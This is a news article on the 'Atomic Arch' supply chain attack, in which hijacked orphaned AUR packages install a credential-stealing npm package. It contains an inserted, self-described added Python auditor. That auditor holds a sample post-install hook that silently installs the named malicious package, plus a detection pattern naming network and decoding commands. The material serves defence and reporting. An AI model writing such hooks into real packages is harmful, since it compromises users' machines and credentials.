Around 1,500 AUR Packages Compromised with "Rootkit-Like" Malware
Researchers at Sonatype uncovered a massive supply chain attack against the Arch User Repository (AUR) to harvest credentials and exfiltrate user data by hijacking around 1,500 packages.
The attack, dubbed "Atomic Arch" by the researchers, is one of the largest attacks against the AUR of all time.
The AUR is a collection of unofficial packages made by the Arch Linux community. There's even a warning on the Arch wiki that packages have not been fully vetted and you use the packages at your own risk.
The campaign targeted packages that have been abandoned by their maintainers for one reason or another.
The attackers are abusing the process for community members to request ownership of orphaned packages.
In the Atomic Arch campaign, attackers appear to be exploiting this process to gain stewardship of trusted packages already used by the community. Attackers adopt orphaned AUR packages. The package keeps its existing name, history, and user trust, but control of its build instructions changes hands.
Cleverly, the attackers did not modify the packages' upstream sources themselves, but instead modified the packages' build instructions, thus bypassing traditional methods of detecting malware.
Specifically, they modified each package's PKGBUILD to add a post-install script that installs a malicious npm package called atomic-lockfile.
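To make the mechanism concrete from the defender's side, the following added example (not code from the article or from Sonatype) is a small Python auditor that a user or a repository reviewer could run over an AUR package's PKGBUILD and its `.install` file before building. It parses the shell functions in both files, flags pacman install hooks (`post_install`, `post_upgrade`, and so on) and PKGBUILD build functions that invoke package managers, downloaders or decoders such as `npm`, `curl` or `base64`, and reports a skipped checksum. The sample PKGBUILD and `.install` file, the package name `example-tool`, and the `example.invalid` URL are constructed for the example; the `atomic-lockfile` name is the one the article reports.

```python
"""Audit an AUR PKGBUILD and its .install script for install-time hooks that
pull or execute code from outside the packaged sources (constructed example)."""
import re
from typing import Dict, List, Optional, Tuple

# Hook functions pacman runs as root at install/upgrade/remove time.
HOOK_NAMES = {"pre_install", "post_install", "pre_upgrade", "post_upgrade",
              "pre_remove", "post_remove"}
# Functions makepkg runs while building the package.
BUILD_FUNCS = {"prepare", "build", "check", "package"}
# Commands that fetch code from the network or decode/execute a hidden payload.
SUSPICIOUS = re.compile(r"\b(npm|npx|pip3?|curl|wget|base64|eval)\b")
FUNC_START = re.compile(r"^\s*([A-Za-z_][\w-]*)\s*\(\)\s*\{")

# Constructed sample PKGBUILD: the build itself looks ordinary.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
install=example-tool.install
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
    cd "$srcdir/$pkgname-$pkgver"
    install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
"""

# Constructed sample .install file modelled on the behaviour the article
# describes: a post-install hook that installs an npm package.
SAMPLE_INSTALL = """\
post_install() {
    # constructed: fetches a package from the npm registry at install time
    npm install -g atomic-lockfile >/dev/null 2>&1
}

post_upgrade() {
    post_install
}
"""


def parse_functions(text: str) -> Dict[str, List[str]]:
    """Map each top-level shell function name to its (stripped) body lines.
    A function ends at the first line consisting solely of '}'."""
    funcs: Dict[str, List[str]] = {}
    current: Optional[str] = None
    body: List[str] = []
    for line in text.splitlines():
        m = FUNC_START.match(line)
        if m and current is None:
            current, body = m.group(1), []
            continue
        if current is not None:
            if line.strip() == "}":
                funcs[current] = body
                current = None
            else:
                body.append(line.strip())
    return funcs


def install_file_name(pkgbuild: str) -> Optional[str]:
    """Return the .install file the PKGBUILD references, if any."""
    m = re.search(r"^\s*install=['\"]?([^'\"\s]+)", pkgbuild, re.M)
    return m.group(1) if m else None


def checksums_skipped(pkgbuild: str) -> bool:
    """True if any checksum array contains SKIP (source integrity unchecked)."""
    return re.search(r"^\s*\w+sums=\([^)]*SKIP", pkgbuild, re.M | re.S) is not None


def scan(pkgbuild: str, install_script: str = "") -> List[Tuple[str, str, str]]:
    """Return (location, command, line) triples for suspicious commands in
    PKGBUILD build functions and .install hook functions."""
    findings: List[Tuple[str, str, str]] = []
    sources = (("PKGBUILD", BUILD_FUNCS, parse_functions(pkgbuild)),
               ("install", HOOK_NAMES, parse_functions(install_script)))
    for label, allowed, funcs in sources:
        for name, body in funcs.items():
            if name not in allowed:
                continue
            for line in body:
                if line.startswith("#"):
                    continue
                m = SUSPICIOUS.search(line)
                if m:
                    findings.append((f"{label}:{name}", m.group(1), line))
    return findings


if __name__ == "__main__":
    print("install file:", install_file_name(SAMPLE_PKGBUILD))
    print("checksums skipped:", checksums_skipped(SAMPLE_PKGBUILD))
    for loc, cmd, line in scan(SAMPLE_PKGBUILD, SAMPLE_INSTALL):
        print(f"[{loc}] {cmd}: {line}")
```

A hit from this scanner is a prompt for human review rather than proof of compromise, since a legitimate package may call `npm` in `package()` to vendor dependencies at build time; what is rarely legitimate is a root-level hook that reaches out to a registry after installation, which is the pattern the article describes. The same check is worth running on the diff between the previously built PKGBUILD and the new one whenever an orphaned package changes maintainer.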
The researchers found that the package hides its activity to make it harder to identify. Its behaviour includes enumerating directories and making network connections, with specific references to SSH keys, browser cookie databases, and the data stores of apps such as Discord, Slack, and Telegram.
These indicators strongly suggest credential stealing and data exfiltration.
The method of compromise is quite sneaky since users will just assume a new update is available for a trusted package and install it without thinking. The attackers essentially hijack the trust built up over the years by package maintainers and bypass the need to convince users to install something new.
Attackers are not building trust from scratch. They're acquiring projects that have already earned it. That dramatically reduces the warning signs developers normally rely on when evaluating software.
2026 has seen a staggering number of supply chain attacks, typically targeting developers' CI/CD infrastructure.
This attack leveraging a widely-used community repository highlights the risks involved in unofficial packages. Hopefully, Arch can harden the process for adopting orphaned packages to perhaps require more vetting.